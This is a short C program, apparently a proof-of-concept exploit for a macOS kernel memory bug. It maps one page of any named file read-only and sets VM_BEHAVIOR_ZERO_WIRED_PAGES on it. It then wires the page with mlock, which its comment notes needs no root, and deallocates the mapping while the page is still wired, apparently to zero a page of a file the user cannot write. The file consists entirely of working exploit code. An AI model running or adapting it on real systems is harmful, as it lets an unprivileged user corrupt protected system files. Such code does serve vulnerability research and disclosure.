#if 0
% clang -o zero_file_page zero_file_page.c

#endif

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>

void* map_file_page_ro(char* path, size_t offset) {
  if ( (offset % PAGE_SIZE) != 0) {
    printf("offset isn't a multiple of PAGE_SIZE\n");
    exit(EXIT_FAILURE);
  }

  int fd = open(path, O_RDONLY);

  if (fd == -1) {
    printf("open failed\n");
    exit(EXIT_FAILURE);
  }

  void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, offset);

  if (mapped_at == MAP_FAILED) {
    printf("mmap failed\n");
    exit(EXIT_FAILURE);  
  }

  return mapped_at;
}

int main(int argc, char** argv) {
  kern_return_t kr;

  if (argc < 3) {
    printf("usage: zero_file_page <PATH> <OFFSET>\n");
    return 0;
  }
  
  char* file_path = argv[1];
  size_t file_offset = strtoull(argv[2], NULL, 0);

  void* page = map_file_page_ro(file_path, file_offset);

  printf("mapped page at offset 0x%016zx in %s at 0x%016llx\n", file_offset, file_path, (uint64_t)page);

  kr = mach_vm_behavior_set(mach_task_self(),
                            (mach_vm_address_t)page,
                            PAGE_SIZE,
                            VM_BEHAVIOR_ZERO_WIRED_PAGES);

  if (kr != KERN_SUCCESS) {
    printf("failed to set VM_BEHAVIOR_ZERO_WIRED_PAGES on the entry\n");
    exit(EXIT_FAILURE);
  }

  printf("set VM_BEHAVIOR_ZERO_WIRED_PAGES\n");
 
  // wire the memory
  // unlike mach_vm_wire mlock doesn't require root 
  int mlock_err = mlock(page, PAGE_SIZE);
  if (mlock_err != 0) {
    perror("mlock failed\n");
    exit(EXIT_FAILURE);
  }
  printf("mlock success\n");

  kr = mach_vm_deallocate(mach_task_self(),
                          (mach_vm_address_t)page,
                          PAGE_SIZE);
  if (kr != KERN_SUCCESS) {
    printf("vm_deallocate failed: %s\n", mach_error_string(kr));
    exit(EXIT_FAILURE);
  }
  printf("deleted map entries before unwiring\n");

  return 0;
}

